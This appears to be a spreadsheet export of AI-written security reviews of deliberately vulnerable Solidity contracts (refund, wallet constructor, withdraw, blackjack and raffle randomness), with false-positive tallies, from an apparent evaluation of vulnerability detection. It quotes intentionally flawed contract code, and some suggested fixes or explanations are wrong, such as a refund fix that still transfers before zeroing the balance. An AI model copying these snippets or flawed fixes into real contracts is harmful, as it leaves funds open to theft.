    <t>Let's first read and analyze the provided Solidity code to identify any potential vulnerabilities.
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   The `refund()` function transfers the balance of a user to the user's address but does not set the user's balance to 0. This means that an attacker can call the `refund()` function repeatedly to drain the contract of its funds.
3. **The business impact of these vulnerabilities in one sentence:**
   The `refund` function leads to unintended repeated withdrawals.
4. **The potential solutions of these vulnerabilities:**
   - In the `refund()` function, after transferring the balance to the user's address, set the user's balance to 0. This will ensure that a user can't repeatedly call the function to drain the contract.
   - Alternatively, you could remove the `refund()` function and let users withdraw their funds using the `withdraw()` function which has the necessary checks and balances in place.
Would you like a corrected version of the code with the vulnerabilities addressed?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The `refund` function sends ether to the `msg.sender` before deducting it from their balance. This can lead to a reentrancy attack, where an attacker can repeatedly call the `refund` function before the previous call completes, draining more ether than they are entitled to.
3. The business impact of these vulnerabilities in one sentence:
The `refund` function leads to potential theft of all contract ether via a reentrancy attack.
4. The potential solutions to this vulnerability:
- Use the Checks-Effects-Interactions pattern. This involves rearranging the code to perform all external calls or sends last. In this context, first, set the user's balance to 0 and then transfer the funds.
- Use a reentrancy guard, which is a pattern that prevents a function from being called while it's already being executed.
Here's a revised version of the function using the Checks-Effects-Interactions pattern:
```solidity
function refund() public {
    uint256 amount = balances[msg.sender];
    require(amount &gt; 0, "No funds to refund");
    balances[msg.sender] = 0;
    msg.sender.transfer(amount);
}
```</t>
  </si>
  <si>
    <t>Alright, I will start by reading the provided Solidity code and analyzing it for any potential access control vulnerabilities.
1. **Are there any access control vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
   - The `refund()` function transfers the user's balance to their address but doesn't reset the user's balance in the `balances` mapping. This means an attacker can call the `refund()` function repeatedly to drain the contract's funds.
   - Code with vulnerability: 
     ```solidity
     function refund() public {
         msg.sender.transfer(balances[msg.sender]);
     }
     ```
3. **The business impact of these vulnerabilities in one sentence:**
   - The `refund()` function leads to potential loss of all contract funds.
4. **The potential solutions of these vulnerabilities:**
   - Update the `refund()` function to set the user's balance to 0 after the transfer:
     ```solidity
     function refund() public {
         uint256 amountToRefund = balances[msg.sender];
         msg.sender.transfer(amountToRefund);
         balances[msg.sender] = 0;
     }
     ```</t>
  </si>
  <si>
    <t>1. **Are there any access control vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
The function `refund()` transfers the balance associated with `msg.sender` to that address without decrementing or setting the balance of `msg.sender` to zero. As a result, an attacker can call the `refund()` function multiple times and drain the contract's Ether.
3. **The business impact of these vulnerabilities in one sentence:** 
The `refund()` function leads to the repeated withdrawal of funds.
4. **The potential solutions of these vulnerabilities:** 
To mitigate this vulnerability, ensure that the balance of `msg.sender` is set to zero before the transfer is made. This prevents multiple withdrawals. The updated function should look something like this:
```solidity
function refund() public {
    uint256 amount = balances[msg.sender];
    require(amount &gt; 0, "No balance to refund");
    balances[msg.sender] = 0; // Set the balance to zero first
    msg.sender.transfer(amount);
}
```
This way, even if the transfer fails for some reason (e.g., due to a reentrancy attack), the balance of the `msg.sender` is already set to zero, preventing repeated withdrawals.</t>
  </si>
  <si>
    <t>dataset/access_control/wallet_03_wrong_constructor.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function initWallet() public {
         creator = msg.sender;
     }</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the provided Solidity code and then analyzing it for potential vulnerabilities.
1. **Are there any vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :** 
The contract has a comment indicating a mistake in the constructor's naming. Instead of a constructor, the contract uses a public function `initWallet()` to set the `creator` address. Since `initWallet()` is public, any user can call this function and become the `creator` of the contract. 
Furthermore, the contract provides a `migrateTo()` function, which lets the `creator` transfer the entire balance of the contract to any address. If a malicious user becomes the `creator` by calling `initWallet()`, they can then use `migrateTo()` to drain all the funds from the contract.
3. **The business impact of these vulnerabilities in one sentence:** 
The misnamed constructor function leads to unauthorized access and potential loss of all funds stored in the contract.
4. **The potential solutions to these vulnerabilities:** 
   - Rename the `initWallet()` function to the proper constructor format based on the Solidity version being used. For version ^0.4.24, the constructor should have the same name as the contract (`Wallet`). For versions &gt;=0.4.22 and &lt;0.5.0, the constructor should be named `constructor()`.
   - Make sure to test the contract thoroughly, especially critical functions that handle fund management, before deploying it to a live environment.
   - Implement access control mechanisms, such as OpenZeppelin's `Ownable`, to securely manage privileged operations.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The function `initWallet()` sets the `creator` to the caller of the function (`msg.sender`). If this function can be called multiple times, it allows anyone to change the `creator` after the contract has been deployed. This poses a significant risk if the `creator` has special privileges in the contract.
3. The business impact of these vulnerabilities in one sentence:
- The `initWallet` function leads to potential unauthorized change of ownership or control over the contract's critical functionalities.
4. The potential solutions of these vulnerabilities:
- Add a state variable, e.g., `bool initialized = false;` to the contract.
- In the `initWallet()` function, check if the contract has already been initialized and only allow the `creator` to be set once. For example:
  ```solidity
  require(!initialized, "Contract is already initialized");
  creator = msg.sender;
  initialized = true;
  ```</t>
  </si>
  <si>
    <t>Let me first review the provided Solidity code to identify any access control vulnerabilities.
1. **Are there any access control vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - The `initWallet()` function is intended to set the `creator` address, but it's not the contract's constructor. This means any user can call `initWallet()` and set themselves as the `creator`.
   - Due to the above vulnerability, any user can call the `migrateTo(address to)` function if they have set themselves as the `creator` and transfer all the funds from the contract to their address.
3. **The business impact of these vulnerabilities in one sentence:** 
   The incorrect implementation of the `initWallet()` function leads to unauthorized users taking control of the contract and potentially draining all its funds.
4. **The potential solutions to these vulnerabilities:**
   - Rename `initWallet()` to the constructor function for the `Wallet` contract so that it can only be executed once when the contract is deployed. This ensures that only the deployer becomes the `creator`.
   - Add a modifier (e.g., `onlyCreator`) to functions that should only be callable by the `creator` to ensure they can't be misused by other users. This modifier should check that `msg.sender` is the `creator` before executing the function.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The function `initWallet()` allows any external actor to reset the `creator` variable to their address, because it's marked `public` and lacks any access control checks.
3. The business impact of these vulnerabilities in one sentence:
Unrestricted access to the `initWallet` function leads to potential unauthorized changes of the `creator` address.
4. The potential solutions to these vulnerabilities:
- Limit access to the `initWallet` function by introducing a modifier that checks if the caller is the original `creator` or some other authorized entity.
- Initialize the `creator` variable in the constructor of the contract, which is only called once when the contract is deployed, and not in a separate function. 
Example:
```solidity
address private creator;
modifier onlyCreator() {
    require(msg.sender == creator, "Not authorized");
    _;
}
constructor() {
    creator = msg.sender;
}
``` 
The above code ensures that only the contract's creator can access certain functionalities, and the `creator` variable is initialized only once during contract deployment.</t>
  </si>
  <si>
    <t>dataset/access_control/wallet_04_confused_sign.sol</t>
  </si>
  <si>
    <t xml:space="preserve">     function withdraw(uint256 amount) public {
         require(amount &gt;= balances[msg.sender]);
         msg.sender.transfer(amount);
         balances[msg.sender] -= amount;
     }</t>
  </si>
  <si>
    <t>Alright, I will begin by reviewing the provided Solidity code.
1. Are there any vulnerabilities?
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the `withdraw` function. Specifically, the line with the `require` statement uses the wrong comparison operator:
```solidity
require(amount &gt;= balances[msg.sender]);
```
This line should ensure that the requested withdrawal `amount` is less than or equal to the user's balance. However, with the current logic, it checks if the `amount` is greater than or equal to the user's balance. This allows a user to withdraw more Ether than they have in their balance.
3. The business impact of these vulnerabilities in one sentence:
The incorrect `require` statement in the `withdraw` function leads to unauthorized and excessive Ether withdrawals.
4. The potential solutions of these vulnerabilities:
Replace the comparison operator in the `require` statement within the `withdraw` function to:
```solidity
require(amount &lt;= balances[msg.sender]);
```
This will ensure that users can only withdraw up to the amount they have in their balance.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- The line `require(amount &gt;= balances[msg.sender]);` is meant to ensure that the user does not withdraw more than their balance. However, the condition should be `amount &lt;= balances[msg.sender]`, not `amount &gt;= balances[msg.sender]`. The current condition checks if the amount is greater than or equal to the user's balance, which is the opposite of what it should be checking.
- The order of operations is incorrect. The `msg.sender.transfer(amount);` line should be after adjusting the `balances[msg.sender]` value. If the `transfer` function were to fail for some reason (e.g., gas limits, recipient contract fallback function failure, etc.), the user's balance would still be deducted.
3. The business impact of these vulnerabilities in one sentence:
- Incorrect condition allows users to withdraw funds without having a sufficient balance, and improper order of operations can lead to potential loss of funds.
4. The potential solutions of these vulnerabilities:
- Change the condition in the `require` statement to `require(amount &lt;= balances[msg.sender]);` to correctly check that the withdrawal amount is less than or equal to the user's balance.
- Adjust the order of operations:
  1. First, deduct the amount from the user's balance: `balances[msg.sender] -= amount;`
  2. Then, transfer the funds to the user: `msg.sender.transfer(amount);`</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code to identify any access control vulnerabilities.
1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the `withdraw` function, specifically in this line:
```solidity
require(amount &gt;= balances[msg.sender]);
```
The line should have been `amount &lt;= balances[msg.sender]` to ensure that a user can only withdraw up to what they have in their balance. The way it's currently written allows anyone to withdraw arbitrary amounts, as long as the requested amount is greater than or equal to their balance, leading to potential theft of all funds in the contract.
3. The business impact of these vulnerabilities in one sentence:
**The incorrect comparison in the `withdraw` function leads to potential theft of all funds in the contract.**
4. The potential solutions to these vulnerabilities:
- Change the comparison in the `withdraw` function to:
```solidity
require(amount &lt;= balances[msg.sender]);
```
- Add unit tests to verify correct behavior and avoid regression in the future. 
- Before deploying any contract, conduct a thorough security audit.</t>
  </si>
  <si>
    <t>1. Are there any access control vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the `require` statement: `require(amount &gt;= balances[msg.sender]);`. This condition should be `amount &lt;= balances[msg.sender]` to ensure that the amount being withdrawn is less than or equal to the user's balance. With the current condition, a user can withdraw more than their balance.
3. The business impact of these vulnerabilities in one sentence:
The `withdraw` function leads to unauthorized withdrawal of funds.
4. The potential solutions to these vulnerabilities:
- Change the `require` statement to `require(amount &lt;= balances[msg.sender]);` to correctly enforce the withdrawal limit based on the user's balance.
- It is also a good practice to update the balance first before transferring the amount to avoid reentrancy attacks. The code should be:
```solidity
require(amount &lt;= balances[msg.sender]);
balances[msg.sender] -= amount;
msg.sender.transfer(amount);
```</t>
  </si>
  <si>
    <t>false positive = 12/(12+17) =0.41379</t>
  </si>
  <si>
    <t>false positive = 4/21 = 0.16</t>
  </si>
  <si>
    <t>dataset/bad_randomness/blackjack.sol</t>
  </si>
  <si>
    <t xml:space="preserve">        function deal(address player, uint8 cardNumber) internal returns (uint8) {
                uint b = block.number;
                uint timestamp = block.timestamp;
                return uint8(uint256(keccak256(block.blockhash(b), player, cardNumber, timestamp)) % 52);
        }</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code to identify any potential vulnerabilities. Once I've analyzed it, I'll respond in the format you've provided.
I've reviewed the provided Solidity code, which seems to be a smart contract implementation for a Blackjack game. Here's the analysis:
1. **Are there any vulnerabilities?**
   - Yes.
2. **how this vulnerability can be exploited :**
   - **Predictable Randomness**:
     - The `deal` function in the `Deck` library uses `block.number`, `block.timestamp`, `block.blockhash(b)`, `player`, and `cardNumber` to generate a random number. Using block properties like `block.number` and `block.timestamp` can be manipulated by miners to some extent. An attacker, especially one with miner capabilities, can manipulate or predict the outcome.
   - **Reentrancy Attack**:
     - In the `stand` function, the state of the game (`games[msg.sender].state`) is updated after the funds are sent to the player using `msg.sender.send()`. This pattern is vulnerable to reentrancy attacks. If the `msg.sender` is a malicious contract, it can call back into the `BlackJack` contract before the state is updated.
   - **Throwing Errors**:
     - The code uses the outdated `throw` statement to revert transactions. This has been replaced by `revert()`, `require()`, and `assert()` in newer versions of Solidity for better clarity and gas efficiency.
   - **Fallback Function**:
     - The fallback function is payable and doesn't have any logic inside. This allows anyone to send Ether to the contract without any restrictions or conditions.
   - **Version Pinning**:
     - The contract uses `pragma solidity ^0.4.2;`. It is advisable to use the latest stable release of Solidity to benefit from all the bug fixes and security enhancements.
3. **The business impact of these vulnerabilities in one sentence:**
   - **Predictable Randomness**:
     - The predictability in card dealing compromises the fairness of the game.
   - **Reentrancy Attack**:
     - Vulnerability in the `stand` function can lead to theft of funds.
   - **Throwing Errors**:
     - Outdated error handling can lead to loss of gas and lack of clarity in error reasons.
   - **Fallback Function**:
     - Unrestricted Ether deposits can lead to accidental loss of funds or clutter the contract balance.
   - **Version Pinning**:
     - Using an outdated compiler exposes the contract to known vulnerabilities.
4. **The potential solutions of these vulnerabilities:**
   - **Predictable Randomness**:
     - Use a more secure method for randomness, such as commit-reveal schemes or off-chain oracle solutions.
   - **Reentrancy Attack**:
     - Always update the state before transferring funds. Consider using the Checks-Effects-Interactions pattern and the reentrancyGuard modifier.
   - **Throwing Errors**:
     - Replace `throw` with `revert()`, `require()`, or `assert()` as appropriate.
   - **Fallback Function**:
     - Add logic to the fallback function to decide under which conditions it should accept Ether or use the `revert()` function to reject any Ether sent.
   - **Version Pinning**:
     - Upgrade to the latest stable version of Solidity and review and adjust the code accordingly.</t>
  </si>
  <si>
    <t>1. The aim of the code: The code aims to generate a pseudo-random card number for a given player in a blockchain card game. It uses the block number, block timestamp, player's address, and the given card number to produce a seemingly random result.
2. Is there any bad randomness vulnerabilities? Yes.
3. The line(s) with vulnerabilities: 
    ```
    uint b = block.number;
    uint timestamp = block.timestamp;
    return uint8(uint256(keccak256(block.blockhash(b), player, cardNumber, timestamp)) % 52);
    ```
4. The type of vulnerabilities of the code in one sentence: The vulnerability lies in the predictability and potential manipulation of the factors used to generate the random number.
5. Specific analysis on how these vulnerabilities form: 
    The `block.number` and `block.timestamp` are public information that can be accessed by any node participating in the network. If a malicious miner knows the player's address and the card number ahead of time, they can potentially manipulate these parameters to generate a favorable card number. In addition, the `block.timestamp` can be manipulated by the miner to a certain degree. 
    Furthermore, the `block.blockhash` function only works for the 256 most recent blocks excluding the current one, thus the randomness generated this way is not secure. 
6. The potential solutions of this vulnerabilities:
    A safer method of generating random numbers in blockchain is by using an oracle to provide the random seed. This would involve an external, trusted entity supplying the randomness which is less predictable and harder to manipulate.
    Another solution is to use the commit-reveal scheme, where the user submits their number in a hidden form (hashed), and then later reveals it. This way, even a miner cannot know the number beforehand.
    A third solution is to use a decentralized randomness beacon, like the one provided by Chainlink VRF (Verifiable Random Function). This provides provably fair and verifiable randomness on-chain. 
    In general, it's recommended to avoid generating random numbers on-chain if possible. If randomness is needed, it's typically safer to generate the random numbers off-chain and then feed them into the smart contract.</t>
  </si>
  <si>
    <t>Alright, let's start by reading and understanding the provided Solidity code. I'll examine the code for any bad randomness vulnerabilities or other potential issues.
The provided code appears to be a Solidity smart contract for a BlackJack game. Let's analyze it for bad randomness vulnerabilities.
1. **Are there any bad randomness vulnerabilities?**
I'll first provide an answer to this question and then proceed with further analysis if needed.
1. **Are there any bad randomness vulnerabilities?**
Yes.
2. **how this vulnerability can be exploited :**
The randomness in this contract is derived from the function `deal` in the `Deck` library:
```solidity
function deal(address player, uint8 cardNumber) internal returns (uint8) {
    uint b = block.number;
    uint timestamp = block.timestamp;
    return uint8(uint256(keccak256(block.blockhash(b), player, cardNumber, timestamp)) % 52);
}
```
The vulnerabilities arise from the following lines:
- `uint b = block.number;`
- `uint timestamp = block.timestamp;`
- `return uint8(uint256(keccak256(block.blockhash(b), player, cardNumber, timestamp)) % 52);`
The use of `block.number`, `block.timestamp`, and `block.blockhash` as sources of randomness is insecure in Ethereum smart contracts. Miners (or anyone who has the ability to influence the block's contents) can manipulate these values, allowing them to potentially predict or change the outcome of the randomness.
3. **The business impact of these vulnerabilities in one sentence:**
The use of insecure randomness sources can allow malicious actors to predict or influence the outcome of card deals, undermining the fairness of the BlackJack game.
4. **The potential solutions of these vulnerabilities:**
- **Use an off-chain oracle**: This involves relying on a trusted external entity to provide randomness. The oracle can fetch a random number from a trusted source and then supply it to the smart contract.
- **Commit-Reveal scheme**: Players submit a hashed version of their random number (commitment) and later reveal it. The revealed numbers from all participants are combined to produce the final random number.
- **Chainlink VRF**: Chainlink VRF (Verifiable Random Function) is a randomness solution for smart contracts, which provides provably fair and verifiable randomness.
- **Avoid using `block.number`, `block.timestamp`, and `block.blockhash` as sources of randomness**: As mentioned, these can be manipulated by miners.
Note: Each of these solutions has its trade-offs. It's crucial to understand them and choose the one that fits the specific requirements of the application best.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
   a. The `block.number` and `block.timestamp` (also known as `now`) can be influenced, to some extent, by miners. A miner could potentially manipulate these values in the short term to gain favorable outcomes.
   b. Using `block.blockhash(b)` for randomness is also not recommended. It only works for the latest 256 blocks. After that, it returns zero, which is predictable.
3. The business impact of these vulnerabilities in one sentence:
   Relying on block variables for randomness in the `deal` function leads to potential gaming of the system by miners or participants with knowledge of blockchain nuances.
4. The potential solutions of these vulnerabilities:
   a. Utilize a commit-reveal scheme. Players first send a hash of their secret value. Once all commitments are collected, they send their actual secrets, which are combined to generate randomness.
   b. Use an external source of randomness such as Chainlink VRF (Verifiable Random Function) which provides provably fair and verifiable randomness for smart contracts.
   c. Implement a multi-source randomness approach where multiple unrelated data sources are combined to generate the final random value, making it harder to manipulate.</t>
  </si>
  <si>
    <t>dataset/bad_randomness/etheraffle.sol</t>
  </si>
  <si>
    <t>uint public blockNumber = block.number;</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the provided Solidity code and then proceed with the analysis as per your requirements.
After analyzing the provided Solidity code, here's the analysis:
1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - **Reentrancy Attack**: The `getRefund` function allows a user to get their refund, but it doesn't have a proper check-then-effect order. Specifically, the refund is sent to the user (effect) before their ticket information is deleted (check). An attacker could recursively call the `getRefund` function to drain the contract of funds.
   - **Block Timestamp Manipulation**: The random number generation uses block properties like `block.number` which can be potentially manipulated by miners.
   - **Owner Privileges**: The functions `endRaffle`, `togglePause`, and `kill` are only restricted by the check `msg.sender == feeAddress`, which means the owner (or anyone who controls the `feeAddress`) can stop the raffle, toggle its state, or destroy the contract.
   - **Lack of Proper Event Logging**: In the `endRaffle` function, if the raffle is ended without a winner, it logs `address(0)` for many fields which could lead to confusion in event tracking.
3. **The business impact of these vulnerabilities in one sentence:** 
   - **Reentrancy Attack**: The `getRefund` function can be exploited to drain the contract's funds.
   - **Block Timestamp Manipulation**: Miners can manipulate the outcome of the raffle.
   - **Owner Privileges**: The owner has unchecked control over the raffle's state, potentially undermining trust.
   - **Lack of Proper Event Logging**: Inaccurate event logs can lead to confusion or misinterpretation of contract events.
4. **The potential solutions of these vulnerabilities:**
   - **Reentrancy Attack**: Implement a check-then-effect pattern and use the `reentrancyGuard` pattern. Specifically, update the ticket data before transferring funds.
   - **Block Timestamp Manipulation**: Use a more secure randomness source, such as Chainlink VRF (Verifiable Random Function) or commit-reveal schemes.
   - **Owner Privileges**: Implement a multi-signature mechanism or a voting mechanism to allow actions like ending the raffle or killing the contract. This ensures that a single address cannot wield unchecked power.
   - **Lack of Proper Event Logging**: Update the `endRaffle` function to log more descriptive events, clearly indicating the state and reason for the raffle's conclusion.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes**.
2. how this vulnerability can be exploited :
The line of code:
```solidity
uint public blockNumber = block.number;
```
directly sets the state variable `blockNumber` to the current block number at the time of contract deployment. The problem here is twofold:
- **Immutability**: Once the contract is deployed, the `blockNumber` variable is set to the block number at that time and never changes again. This may lead to misinterpretation or misuse, as one might expect it to always represent the current block number.
- **Predictability**: If the intention was to use the block number for some sort of randomness, it doesn't serve that purpose since the value is set once and never updated.
3. The business impact of these vulnerabilities in one sentence:
The immutable `blockNumber` value leads to potential misinterpretation, misuse, or flawed randomness assumptions in the contract's logic.
4. The potential solutions of these vulnerabilities:
- If the intention is to always get the current block number, replace the state variable with a function that returns `block.number`.
- If the intention was to use this for randomness, consider other more secure and unpredictable methods for randomness, such as using Chainlink VRF or committing to values before revealing them.
- Always provide clear comments or documentation regarding the purpose and behavior of variables to avoid misinterpretation.</t>
  </si>
  <si>
    <t>Alright, I will begin by reading the provided Solidity code file and analyzing it for bad randomness vulnerabilities.
Let's analyze the provided code for potential bad randomness vulnerabilities:
1. **Are there any bad randomness vulnerabilities?**
   The primary area to scrutinize in Solidity contracts for randomness vulnerabilities is when determining any kind of winner or outcome based on random values.
After analyzing the provided code, we can ascertain whether there are any bad randomness vulnerabilities.
Upon examining the provided code, the primary area of interest is the `resolveRaffle()` function, which determines the raffle winner. In this function, the following steps are used to generate the random number for the winning ticket:
1. Three seeds (`seed1`, `seed2`, and `seed3`) are combined to generate a `randHash`.
2. This `randHash` is then used to determine the `winningNumber`.
However, the content provided does not show the full implementation of the `resolveRaffle()` function or the actual method used to generate the random number. This makes it challenging to conclusively state if there are bad randomness vulnerabilities.
Given the available information:
1. **Are there any bad randomness vulnerabilities?**
   - Not sure.
Since we're unsure about the randomness vulnerabilities, we cannot provide a proof of concept, business impact, or potential solutions. 
It would be helpful to see the complete implementation of the `resolveRaffle()` function and any other associated methods that contribute to the generation of the `randHash` and `winningNumber`. If possible, please provide the full implementation or further details regarding the randomness generation to assist in a more comprehensive analysis.</t>
  </si>
  <si>
    <t>1. Are there any bad randomness vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability lies in the use of `block.number` as a source of randomness or unique value. `block.number` refers to the number of the most recent block. Miners and participants in the Ethereum network have visibility into the current `block.number`, so any logic or contract functionality that relies on it as a unique or random value is predictable and can be exploited by those who can anticipate or influence the outcome.
3. The business impact of these vulnerabilities in one sentence:
Relying on `block.number` for randomness or uniqueness can be exploited, leading to predictable contract behavior and potential financial losses.
4. The potential solutions of this vulnerabilities:
- Do not use `block.number` as a source of randomness or unique value. If randomness is needed, consider using Chainlink VRF (Verifiable Random Function) or similar decentralized randomness solutions.
- If a unique value is needed but not necessarily random, consider other on-chain or off-chain mechanisms that are less predictable and harder to influence.</t>
  </si>
  <si>
    <t xml:space="preserve">    function chooseWinner() private {
        address seed1 = contestants[uint(block.coinbase) % totalTickets].addr;
        address seed2 = contestants[uint(msg.sender) % totalTickets].addr;
        uint seed3 = block.difficulty;
        bytes32 randHash = keccak256(seed1, seed2, seed3);
        uint winningNumber = uint(randHash) % totalTickets;
        address winningAddress = contestants[winningNumber].addr;
        RaffleResult(raffleId, winningNumber, winningAddress, seed1, seed2, seed3, randHash);
        // Start next raffle
        raffleId++;
        nextTicket = 0;
        blockNumber = block.number;
        // gaps.length = 0 isn't necessary here,
        // because buyTickets() eventually clears
        // the gaps array in the loop itself.
        // Distribute prize and fee
        winningAddress.transfer(prize);
        feeAddress.transfer(fee);
    }</t>
  </si>
  <si>
    <t>(the same as above) "Alright, I'll start by reading the provided Solidity code and then proceed with the analysis as per your requirements.
After analyzing the provided Solidity code, here's the analysis:
1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :**
   - **Reentrancy Attack**: The `getRefund` function allows a user to get their refund, but it doesn't have a proper check-then-effect order. Specifically, the refund is sent to the user (effect) before their ticket information is deleted (check). An attacker could recursively call the `getRefund` function to drain the contract of funds.
   - **Block Timestamp Manipulation**: The random number generation uses block properties like `block.number` which can be potentially manipulated by miners.
   - **Owner Privileges**: The functions `endRaffle`, `togglePause`, and `kill` are only restricted by the check `msg.sender == feeAddress`, which means the owner (or anyone who controls the `feeAddress`) can stop the raffle, toggle its state, or destroy the contract.
   - **Lack of Proper Event Logging**: In the `endRaffle` function, if the raffle is ended without a winner, it logs `address(0)` for many fields which could lead to confusion in event tracking.
3. **The business impact of these vulnerabilities in one sentence:** 
   - **Reentrancy Attack**: The `getRefund` function can be exploited to drain the contract's funds.
   - **Block Timestamp Manipulation**: Miners can manipulate the outcome of the raffle.
   - **Owner Privileges**: The owner has unchecked control over the raffle's state, potentially undermining trust.
   - **Lack of Proper Event Logging**: Inaccurate event logs can lead to confusion or misinterpretation of contract events.
4. **The potential solutions of these vulnerabilities:**
   - **Reentrancy Attack**: Implement a check-then-effect pattern and use the `reentrancyGuard` pattern. Specifically, update the ticket data before transferring funds.
   - **Block Timestamp Manipulation**: Use a more secure randomness source, such as Chainlink VRF (Verifiable Random Function) or commit-reveal schemes.
   - **Owner Privileges**: Implement a multi-signature mechanism or a voting mechanism to allow actions like ending the raffle or killing the contract. This ensures that a single address cannot wield unchecked power.
   - **Lack of Proper Event Logging**: Update the `endRaffle` function to log more descriptive events, clearly indicating the state and reason for the raffle's conclusion."</t>
  </si>
  <si>
    <t>1. Are there any bad randomness vulnerabilities?
Yes.
2. how this vulnerability can be exploited :
The randomness in this function is derived from various sources:
a. `block.coinbase` (the address of the miner that mined the current block)
b. `msg.sender` (the address of the entity calling the function)
c. `block.difficulty` (the difficulty of the current block)
Using blockchain parameters like `block.coinbase` and `block.difficulty` is problematic because they can potentially be influenced by miners. For example, a miner with sufficient computational power might be able to manipulate the block's contents to increase the chances of a favorable outcome. The `msg.sender` can also be manipulated by the sender itself, as they have control over which address sends the transaction.
3. The business impact of these vulnerabilities in one sentence:
The use of manipulable blockchain parameters and the sender's address as randomness seeds can lead to unfair lottery outcomes and potential loss of funds.
4. The potential solutions of these vulnerabilities:
a. **Use a Commit-Reveal scheme**: In this scheme, users send their random numbers in a hashed form (commit). Once everyone has sent their numbers, they reveal the actual number. The final random number is derived from the combination of all revealed numbers.
b. **Use an off-chain trusted oracle**: Trusted oracles can provide truly random numbers that are not influenced by blockchain parameters. However, this introduces the requirement to trust an external entity.
c. **Use a future block hash**: Instead of using the current block's properties, use properties from a future block (e.g., a block hash from 100 blocks in the future). This way, when a user buys a ticket, they cannot know the result in advance, as it depends on a future event. However, this still doesn't prevent a powerful miner from trying to influence the result.
d. **Use external randomness sources**: Chainlink VRF (Verifiable Random Function) is a source of randomness that is verifiable on-chain. It ensures that the result was not tampered with and is genuinely random.</t>
  </si>
  <si>
    <t>(the same as above)"Alright, I will begin by reading the provided Solidity code file and analyzing it for bad randomness vulnerabilities.
Let's analyze the provided code for potential bad randomness vulnerabilities:
1. **Are there any bad randomness vulnerabilities?**
   The primary area to scrutinize in Solidity contracts for randomness vulnerabilities is when determining any kind of winner or outcome based on random values.
After analyzing the provided code, we can ascertain whether there are any bad randomness vulnerabilities.
Upon examining the provided code, the primary area of interest is the `resolveRaffle()` function, which determines the raffle winner. In this function, the following steps are used to generate the random number for the winning ticket:
1. Three seeds (`seed1`, `seed2`, and `seed3`) are combined to generate a `randHash`.
2. This `randHash` is then used to determine the `winningNumber`.
However, the content provided does not show the full implementation of the `resolveRaffle()` function or the actual method used to generate the random number. This makes it challenging to conclusively state if there are bad randomness vulnerabilities.
Given the available information:
1. **Are there any bad randomness vulnerabilities?**
   - Not sure.
Since we're unsure about the randomness vulnerabilities, we cannot provide a proof of concept, business impact, or potential solutions. 
It would be helpful to see the complete implementation of the `resolveRaffle()` function and any other associated methods that contribute to the generation of the `randHash` and `winningNumber`. If possible, please provide the full implementation or further details regarding the randomness generation to assist in a more comprehensive analysis."</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
- **Predictable Randomness**: The randomness in this function is sourced from `block.coinbase`, `msg.sender`, and `block.difficulty`. All of these are either directly accessible or predictable to varying extents. An attacker can influence the random result if they have the capability to control or have knowledge of these parameters.
  - **Lines with vulnerability**: 
    - `address seed1 = contestants[uint(block.coinbase) % totalTickets].addr;`
    - `address seed2 = contestants[uint(msg.sender) % totalTickets].addr;`
    - `uint seed3 = block.difficulty;`
    - `bytes32 randHash = keccak256(seed1, seed2, seed3);`
3. The business impact of these vulnerabilities in one sentence:
- **Predictable Randomness leads to potential manipulation of the winner by a malicious actor.**
4. The potential solutions to these vulnerabilities:
- **Unpredictable Randomness**: One way to generate unpredictable randomness on-chain is to use off-chain oracles or commit-reveal schemes, though they come with their own trust assumptions and complexities. The randomness used in the function should ideally be unpredictable and not influenced by any external factor.
- **Third-party services**: There are third-party services and smart contracts that specialize in providing secure randomness for blockchain applications. Consider integrating with one of them if randomness is a critical aspect of the contract's functionality. 
- **Delay the Determination**: Another approach is to split the process into two parts: in the first, users commit to some value, and in the second, they reveal it. Combining all the revealed values can then be used to determine a winner. This way, no single participant can predict or manipulate the outcome after all commitments are made.
Always remember, randomness on blockchains is a challenging problem. Any approach will have trade-offs in terms of security, user experience, and cost.</t>
  </si>
  <si>
    <t xml:space="preserve">    function endRaffle() public {
        if (msg.sender == feeAddress) {
            paused = true;
            for (uint i = 0; i &lt; totalTickets; i++) {
                if (raffleId == contestants[i].raffleId) {
                    TicketRefund(raffleId, contestants[i].addr, i);
                    contestants[i].addr.transfer(pricePerTicket);
                }
            }
            RaffleResult(raffleId, totalTickets, address(0), address(0), address(0), 0, 0);
            raffleId++;
            nextTicket = 0;
            blockNumber = block.number;
            gaps.length = 0;
        }
    }</t>
  </si>
  <si>
    <t>1. **Are there any vulnerabilities?** 
Yes.
2. **how this vulnerability can be exploited :**
   - **Reentrancy Attack**: The function transfers ether using the `transfer` method inside the loop. Although the `transfer` method is safer than the `send` or `call` methods, if the logic before the transfer in the loop is not correctly implemented, it can still be vulnerable to a reentrancy attack. The `TicketRefund` event is triggered before the actual transfer, which could be misleading as an external observer might think a transfer has happened even before it actually does. A malicious contract can be made such that it always fails the transfer, causing the loop to execute indefinitely without actually transferring funds.
3. **The business impact of these vulnerabilities in one sentence:** 
